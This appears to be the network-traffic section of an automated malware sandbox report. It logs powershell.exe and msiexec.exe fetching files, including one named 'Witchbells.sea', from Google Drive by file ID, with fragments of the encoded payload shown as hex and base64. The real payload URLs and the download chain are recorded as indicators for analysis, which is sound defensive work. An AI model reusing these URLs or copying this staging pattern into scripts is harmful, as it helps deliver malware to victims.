                                              Oct 25, 2024 19:44:09.748047113 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:09.760307074 CEST44349740172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:09.760422945 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:09.760431051 CEST44349740172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:09.760479927 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:09.776113033 CEST44349740172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:09.776173115 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:09.776180983 CEST44349740172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:09.776228905 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:09.785701036 CEST44349740172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:09.785758972 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:09.785773039 CEST44349740172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:09.785823107 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:09.798105955 CEST44349740172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:09.798198938 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:09.798264027 CEST44349740172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:09.798310995 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:09.835606098 CEST44349740172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:09.835689068 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:09.835731030 CEST44349740172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:09.835794926 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:09.835808992 CEST44349740172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:09.835865021 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:09.843478918 CEST44349740172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:09.843548059 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:09.845511913 CEST44349740172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:09.845596075 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:09.845650911 CEST44349740172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:09.845705986 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:09.848565102 CEST44349740172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:09.848627090 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:09.855709076 CEST44349740172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:09.855789900 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:09.861285925 CEST44349740172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:09.861346960 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:09.861363888 CEST44349740172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:09.861417055 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:09.873625994 CEST44349740172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:09.873687029 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:09.873704910 CEST44349740172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:09.873760939 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:10.245157003 CEST44349740172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:10.245209932 CEST44349740172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:10.245235920 CEST44349740172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:10.245362043 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:10.245362043 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:10.245362043 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:10.245435953 CEST44349740172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:10.245495081 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:10.245567083 CEST44349740172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:10.245616913 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:10.245631933 CEST44349740172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:10.245685101 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:10.245697975 CEST44349740172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:10.245747089 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:10.246201992 CEST44349740172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:10.246263027 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:10.246274948 CEST44349740172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:10.246320009 CEST44349740172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:10.246320963 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:10.246332884 CEST44349740172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:10.246367931 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:10.246387959 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:10.247137070 CEST44349740172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:10.247186899 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:10.247198105 CEST44349740172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:10.247263908 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:10.247277975 CEST44349740172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:10.247330904 CEST44349740172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:10.247338057 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:10.247351885 CEST44349740172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:10.247415066 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:10.247415066 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:10.248069048 CEST44349740172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:10.248121977 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:10.248135090 CEST44349740172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:10.248176098 CEST44349740172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:10.248186111 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:10.248198032 CEST44349740172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:10.248226881 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:10.248245955 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:10.248255014 CEST44349740172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:10.248306990 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:10.249108076 CEST44349740172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:10.249160051 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:10.250997066 CEST44349740172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:10.251045942 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:10.251070976 CEST44349740172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:10.251104116 CEST44349740172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:10.251116037 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:10.251128912 CEST44349740172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:10.251159906 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:10.251187086 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:10.251430035 CEST44349740172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:10.251478910 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:10.253079891 CEST44349740172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:10.253170013 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:10.253222942 CEST44349740172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:10.253269911 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:10.253283978 CEST44349740172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:10.253334045 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:10.253411055 CEST44349740172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:10.253458977 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:10.253463030 CEST44349740172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:10.253473997 CEST44349740172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:10.253510952 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:10.253523111 CEST44349740172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:10.253545046 CEST44349740172.217.16.193192.168.2.4
                                              Oct 25, 2024 19:44:10.253575087 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:10.253599882 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:10.295733929 CEST49740443192.168.2.4172.217.16.193
                                              Oct 25, 2024 19:44:10.295783043 CEST44349740172.217.16.193192.168.2.4
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 25, 2024 19:43:20.045927048 CEST | 57333 | 53 | 192.168.2.4 | 1.1.1.1
Oct 25, 2024 19:43:20.053527117 CEST | 53 | 57333 | 1.1.1.1 | 192.168.2.4
Oct 25, 2024 19:43:21.397278070 CEST | 61043 | 53 | 192.168.2.4 | 1.1.1.1
Oct 25, 2024 19:43:21.406833887 CEST | 53 | 61043 | 1.1.1.1 | 192.168.2.4

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 25, 2024 19:43:20.045927048 CEST | 192.168.2.4 | 1.1.1.1 | 0x3eb3 | Standard query (0) | drive.google.com | A (IP address) | IN (0x0001) | false
Oct 25, 2024 19:43:21.397278070 CEST | 192.168.2.4 | 1.1.1.1 | 0x60d5 | Standard query (0) | drive.usercontent.google.com | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 25, 2024 19:43:20.053527117 CEST | 1.1.1.1 | 192.168.2.4 | 0x3eb3 | No error (0) | drive.google.com |  | 142.250.185.238 | A (IP address) | IN (0x0001) | false
Oct 25, 2024 19:43:21.406833887 CEST | 1.1.1.1 | 192.168.2.4 | 0x60d5 | No error (0) | drive.usercontent.google.com |  | 172.217.16.193 | A (IP address) | IN (0x0001) | false
                                              • drive.google.com
                                              • drive.usercontent.google.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 142.250.185.238 | 443 | 7100 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-25 17:43:20 UTC | 215 | OUT | GET /uc?export=download&id=1DRx-4-s5-42ec55vnFOOkcNRWq_xpf4e HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Host: drive.google.com
                                              Connection: Keep-Alive
2024-10-25 17:43:21 UTC | 1610 | IN | HTTP/1.1 303 See Other
                                              Content-Type: application/binary
                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                              Pragma: no-cache
                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                              Date: Fri, 25 Oct 2024 17:43:21 GMT
                                              Location: https://drive.usercontent.google.com/download?id=1DRx-4-s5-42ec55vnFOOkcNRWq_xpf4e&export=download
                                              Strict-Transport-Security: max-age=31536000
                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                              Content-Security-Policy: script-src 'nonce--phou_tpzcJJKD23-KRofQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                              Cross-Origin-Opener-Policy: same-origin
                                              Server: ESF
                                              Content-Length: 0
                                              X-XSS-Protection: 0
                                              X-Frame-Options: SAMEORIGIN
                                              X-Content-Type-Options: nosniff
                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                              Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49731 | 142.250.185.238 | 443 | 7100 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-25 17:43:26 UTC | 121 | OUT | GET /uc?export=download&id=1DRx-4-s5-42ec55vnFOOkcNRWq_xpf4e HTTP/1.1
                                              Host: drive.google.com
                                              Connection: Keep-Alive
2024-10-25 17:43:26 UTC | 1319 | IN | HTTP/1.1 303 See Other
                                              Content-Type: application/binary
                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                              Pragma: no-cache
                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                              Date: Fri, 25 Oct 2024 17:43:26 GMT
                                              Location: https://drive.usercontent.google.com/download?id=1DRx-4-s5-42ec55vnFOOkcNRWq_xpf4e&export=download
                                              Strict-Transport-Security: max-age=31536000
                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                              Content-Security-Policy: script-src 'report-sample' 'nonce-ugPDwgbpipAK2Dzg-BF62A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                              Cross-Origin-Opener-Policy: same-origin
                                              Server: ESF
                                              Content-Length: 0
                                              X-XSS-Protection: 0
                                              X-Frame-Options: SAMEORIGIN
                                              X-Content-Type-Options: nosniff
                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                              Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49732 | 172.217.16.193 | 443 | 7100 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-25 17:43:27 UTC | 139 | OUT | GET /download?id=1DRx-4-s5-42ec55vnFOOkcNRWq_xpf4e&export=download HTTP/1.1
                                              Host: drive.usercontent.google.com
                                              Connection: Keep-Alive
2024-10-25 17:43:29 UTC | 4916 | IN | HTTP/1.1 200 OK
                                              Content-Type: application/octet-stream
                                              Content-Security-Policy: sandbox
                                              Content-Security-Policy: default-src 'none'
                                              Content-Security-Policy: frame-ancestors 'none'
                                              X-Content-Security-Policy: sandbox
                                              Cross-Origin-Opener-Policy: same-origin
                                              Cross-Origin-Embedder-Policy: require-corp
                                              Cross-Origin-Resource-Policy: same-site
                                              X-Content-Type-Options: nosniff
                                              Content-Disposition: attachment; filename="Witchbells.sea"
                                              Access-Control-Allow-Origin: *
                                              Access-Control-Allow-Credentials: false
                                              Access-Control-Allow-Headers: Accept, Accept-Language, Authorization, Cache-Control, Content-Disposition, Content-Encoding, Content-Language, Content-Length, Content-MD5, Content-Range, Content-Type, Date, developer-token, financial-institution-id, X-Goog-Sn-Metadata, X-Goog-Sn-PatientId, GData-Version, google-cloud-resource-prefix, linked-customer-id, login-customer-id, x-goog-request-params, Host, If-Match, If-Modified-Since, If-None-Match, If-Unmodified-Since, Origin, OriginToken, Pragma, Range, request-id, Slug, Transfer-Encoding, hotrod-board-name, hotrod-chrome-cpu-model, hotrod-chrome-processors, Want-Digest, X-Ad-Manager-Impersonation, x-chrome-connected, X-ClientDetails, X-Client-Pctx, X-Client-Version, x-debug-settings-metadata, X-Firebase-Locale, X-Goog-Firebase-Installations-Auth, X-Firebase-Client, X-Firebase-Client-Log-Type, X-Firebase-GMPID, X-Firebase-Auth-Token, X-Firebase-AppCheck, X-Firebase-Token, X-Goog-Drive-Client-Version, X-Goog-Drive-Resource-Keys, X-GData-Client, X-GData-Key, X-GoogA [TRUNCATED]
                                              Access-Control-Allow-Methods: GET,HEAD,OPTIONS
                                              Accept-Ranges: bytes
                                              Content-Length: 433020
                                              Last-Modified: Thu, 24 Oct 2024 09:06:20 GMT
                                              X-GUploader-UploadID: AHmUCY14zGJEuWoNXlrxCBzIr_13f9aYMN2B2AQFDLfiKHU20Uqrs_USMPzkRgLNIvuAB_ehWM1T92o8KA
                                              Date: Fri, 25 Oct 2024 17:43:29 GMT
                                              Expires: Fri, 25 Oct 2024 17:43:29 GMT
                                              Cache-Control: private, max-age=0
                                              X-Goog-Hash: crc32c=XNy+Sw==
                                              Server: UploadServer
                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                              Connection: close
                                              Data Ascii: oU2KfWjFon28yZy8gSJ8BftEW4er1HIxlQ24iYqyyZHB8yxpt3qWF7LgPdTe//J0VxX5/qg00xk6svOE9QSb/nxb+7lN4wuydTmhRl1dqtStZ2KUusMWX/Dkj7yywnqnpgTumLrCepi6wnqmubaN8MYwZqssYxrbngGz9DLwgEK+hHCqX7UQuMskwIn4IRC/555Gn6nKepi6wnqYusI/ThcATSCHISLTA3FCuYGV9M7fLPeccJNL9fPFR3DW6Rv
                                              2024-10-25 17:43:30 UTC1378INData Raw: 42 39 55 71 67 59 50 4a 48 6b 73 46 30 45 6e 70 77 50 41 71 33 6e 69 76 38 45 59 66 66 52 30 78 6d 2f 41 38 42 53 50 68 74 35 59 51 4a 6d 71 4d 37 57 4c 52 38 56 5a 42 57 68 4f 41 74 42 62 54 58 35 64 50 41 5a 31 33 45 45 6f 7a 76 6a 32 56 2f 78 6f 46 6d 44 42 77 4b 39 4a 78 72 39 30 68 61 55 4b 47 57 4b 72 45 39 75 58 61 32 51 6d 73 4d 6b 5a 58 73 37 39 33 71 39 48 47 6a 64 4c 57 68 39 52 2f 46 63 69 41 61 39 33 63 36 35 6f 65 68 65 52 56 63 6e 2f 67 50 43 30 4a 52 71 54 57 49 67 63 63 5a 77 6e 51 45 31 4e 31 68 50 77 71 66 57 32 46 35 6e 44 6f 37 35 53 50 49 45 6b 51 37 73 2f 73 4a 48 38 2b 58 77 4b 42 32 32 51 51 68 39 6b 38 75 31 38 67 61 39 43 75 72 74 54 5a 42 39 55 4b 71 58 6e 69 71 39 79 51 77 42 31 72 52 65 38 7a 67 39 6f 70 31 42 39 39 76 69 41
                                              Data Ascii: B9UqgYPJHksF0EnpwPAq3niv8EYffR0xm/A8BSPht5YQJmqM7WLR8VZBWhOAtBbTX5dPAZ13EEozvj2V/xoFmDBwK9Jxr90haUKGWKrE9uXa2QmsMkZXs793q9HGjdLWh9R/FciAa93c65oeheRVcn/gPC0JRqTWIgccZwnQE1N1hPwqfW2F5nDo75SPIEkQ7s/sJH8+XwKB22QQh9k8u18ga9CurtTZB9UKqXniq9yQwB1rRe8zg9op1B99viA
                                              2024-10-25 17:43:30 UTC1378INData Raw: 43 50 77 37 58 72 52 4f 63 47 6e 6d 4f 57 38 4c 39 65 65 46 35 45 35 4c 34 41 69 71 76 51 31 74 56 37 64 73 66 54 5a 45 38 6f 31 2b 76 51 32 4a 75 68 32 62 4e 71 53 36 67 73 36 59 75 73 4a 36 6d 4c 72 43 65 74 77 6f 72 65 77 52 65 41 34 41 6d 49 64 36 39 58 6d 71 50 30 30 56 4d 55 32 4c 6f 48 76 2f 32 45 4d 34 4d 58 6b 2f 76 4d 50 7a 53 75 6a 73 44 49 53 2b 77 6e 73 36 43 63 4b 65 66 72 34 53 36 42 31 50 42 70 79 63 43 6c 50 59 4c 73 71 51 66 6b 67 72 72 62 76 55 36 4f 52 4e 7a 4c 37 43 65 54 77 71 78 6e 71 59 41 41 43 67 41 41 43 67 41 41 43 67 41 41 43 67 41 41 43 67 41 41 43 67 41 41 43 67 41 41 43 67 41 41 43 67 41 41 43 67 41 41 43 67 41 41 43 67 41 41 43 67 41 41 43 67 41 41 43 67 41 41 43 67 41 41 43 67 41 41 43 67 41 41 43 67 41 41 43 67 41 41 43
                                              Data Ascii: CPw7XrROcGnmOW8L9eeF5E5L4AiqvQ1tV7dsfTZE8o1+vQ2Juh2bNqS6gs6YusJ6mLrCetworewReA4AmId69XmqP00VMU2LoHv/2EM4MXk/vMPzSujsDIS+wns6CcKefr4S6B1PBpycClPYLsqQfkgrrbvU6ORNzL7CeTwqxnqYAACgAACgAACgAACgAACgAACgAACgAACgAACgAACgAACgAACgAACgAACgAACgAACgAACgAACgAACgAACgAAC
                                              2024-10-25 17:43:30 UTC1378INData Raw: 33 70 38 36 4e 59 5a 34 57 38 47 68 77 74 6d 4e 69 49 76 67 38 31 46 77 75 73 77 53 35 71 65 59 46 49 66 2f 36 55 46 48 4b 63 75 73 46 4c 36 41 42 77 74 4f 65 62 6d 65 77 49 57 71 59 59 79 77 32 73 6a 63 43 62 74 30 38 79 69 69 46 6c 4e 6a 42 4e 4c 61 61 79 48 78 37 57 6f 57 73 78 54 72 4e 69 78 61 51 48 2f 48 35 49 4b 75 70 63 70 56 54 47 71 67 76 35 62 58 32 57 76 6e 4c 70 54 30 39 42 70 39 5a 55 49 2f 49 79 2f 4d 57 31 59 33 6b 57 56 4a 39 32 74 47 6c 54 61 4d 58 55 72 4b 6c 78 6c 4a 2b 31 6f 43 68 6d 6a 4f 5a 31 48 55 57 74 4b 4b 56 64 70 35 49 70 59 6b 68 39 67 6a 75 71 5a 65 4d 77 4c 30 7a 66 37 2f 55 79 61 59 50 54 46 4c 31 76 55 46 30 32 74 63 2f 6f 76 71 7a 69 66 70 69 36 2f 6e 6e 31 35 73 4a 36 6d 4c 72 43 65 70 69 36 2f 52 35 49 6c 31 48 62 38
                                              Data Ascii: 3p86NYZ4W8GhwtmNiIvg81FwuswS5qeYFIf/6UFHKcusFL6ABwtOebmewIWqYYyw2sjcCbt08yiiFlNjBNLaayHx7WoWsxTrNixaQH/H5IKupcpVTGqgv5bX2WvnLpT09Bp9ZUI/Iy/MW1Y3kWVJ92tGlTaMXUrKlxlJ+1oChmjOZ1HUWtKKVdp5IpYkh9gjuqZeMwL0zf7/UyaYPTFL1vUF02tc/ovqzifpi6/nn15sJ6mLrCepi6/R5Il1Hb8
                                              2024-10-25 17:43:30 UTC1378INData Raw: 41 2b 44 41 46 48 31 42 38 56 52 7a 66 72 30 5a 6f 31 61 49 69 48 31 42 73 6f 49 37 34 70 37 36 63 4c 56 6e 57 65 44 6d 38 2b 6c 31 48 41 4d 32 57 4b 43 44 75 7a 79 32 6a 30 4a 79 6d 4c 6e 77 4a 5a 75 79 36 4c 4e 46 72 35 54 38 55 62 59 4a 32 6d 43 4f 30 6e 69 50 75 76 78 73 37 31 45 39 68 39 70 61 31 65 2f 72 75 6e 57 58 54 55 33 65 72 33 30 76 48 4a 5a 4f 75 57 4b 33 4d 4b 31 56 39 77 76 67 35 6e 6e 79 37 31 2b 30 4b 51 48 75 74 54 50 69 74 68 42 62 64 76 68 4f 52 4e 7a 75 45 76 4a 2b 54 4d 41 58 47 66 6e 54 70 50 33 56 51 2f 71 58 31 39 69 39 72 6b 46 4c 42 63 49 4b 48 65 56 2b 65 4a 4a 57 36 55 59 48 42 48 4c 79 74 78 6a 7a 49 36 52 54 38 53 50 74 50 37 36 6c 6c 2b 4d 2b 4b 6b 57 45 52 2f 4a 36 6d 4c 72 43 65 70 69 36 77 76 57 75 6b 6a 61 73 58 33 77
                                              Data Ascii: A+DAFH1B8VRzfr0Zo1aIiH1BsoI74p76cLVnWeDm8+l1HAM2WKCDuzy2j0JymLnwJZuy6LNFr5T8UbYJ2mCO0niPuvxs71E9h9pa1e/runWXTU3er30vHJZOuWK3MK1V9wvg5nny71+0KQHutTPithBbdvhORNzuEvJ+TMAXGfnTpP3VQ/qX19i9rkFLBcIKHeV+eJJW6UYHBHLytxjzI6RT8SPtP76ll+M+KkWER/J6mLrCepi6wvWukjasX3w
                                              2024-10-25 17:43:30 UTC1378INData Raw: 79 71 55 48 37 44 37 6f 48 62 52 49 62 53 65 4c 53 4b 55 4a 4d 45 6c 65 79 64 4f 45 4c 47 61 70 6e 34 49 6c 66 38 6e 63 36 76 51 46 68 66 41 6f 7a 50 4c 74 38 73 44 62 36 5a 78 4a 44 6d 57 75 66 46 39 56 47 77 66 38 6f 66 38 78 4b 7a 35 79 74 6b 33 6b 77 59 73 6b 33 75 45 75 68 4b 6a 73 58 66 55 4e 58 31 6a 69 49 73 4c 64 75 49 6b 2b 6c 68 41 6c 43 66 63 73 51 2b 75 45 7a 46 73 59 55 39 49 71 53 38 6b 7a 50 49 4a 66 31 71 41 63 39 74 32 79 59 7a 52 69 2f 62 61 76 4a 56 48 47 33 51 35 64 53 66 74 53 4a 36 6d 4c 6a 6b 54 45 53 2b 77 6e 76 65 58 44 2f 4a 45 56 44 46 76 47 72 35 55 30 79 66 48 54 39 78 57 77 54 46 76 34 50 70 6f 58 69 66 76 6f 6b 65 58 56 6a 6d 76 35 38 73 67 7a 38 54 7a 56 4b 51 6c 72 62 75 55 6e 4d 54 54 32 6b 69 34 73 53 34 7a 39 6b 47 45
                                              Data Ascii: yqUH7D7oHbRIbSeLSKUJMEleydOELGapn4Ilf8nc6vQFhfAozPLt8sDb6ZxJDmWufF9VGwf8of8xKz5ytk3kwYsk3uEuhKjsXfUNX1jiIsLduIk+lhAlCfcsQ+uEzFsYU9IqS8kzPIJf1qAc9t2yYzRi/bavJVHG3Q5dSftSJ6mLjkTES+wnveXD/JEVDFvGr5U0yfHT9xWwTFv4PpoXifvokeXVjmv58sgz8TzVKQlrbuUnMTT2ki4sS4z9kGE


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              3 | 192.168.2.4 | 49739 | 142.250.185.238 | 443 | 4092 | C:\Windows\SysWOW64\msiexec.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              2024-10-25 17:44:05 UTC | 216 | OUT | GET /uc?export=download&id=1TSnT8xbrS5tZaye7appIkoH65YDvY-YN HTTP/1.1
                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                              Host: drive.google.com
                                              Cache-Control: no-cache
                                              2024-10-25 17:44:05 UTC | 1610 | IN | HTTP/1.1 303 See Other
                                              Content-Type: application/binary
                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                              Pragma: no-cache
                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                              Date: Fri, 25 Oct 2024 17:44:05 GMT
                                              Location: https://drive.usercontent.google.com/download?id=1TSnT8xbrS5tZaye7appIkoH65YDvY-YN&export=download
                                              Strict-Transport-Security: max-age=31536000
                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                              Content-Security-Policy: script-src 'nonce-Vg0guAu_EtGzO0xG95QJ1w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                              Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                              Cross-Origin-Opener-Policy: same-origin
                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                              Server: ESF
                                              Content-Length: 0
                                              X-XSS-Protection: 0
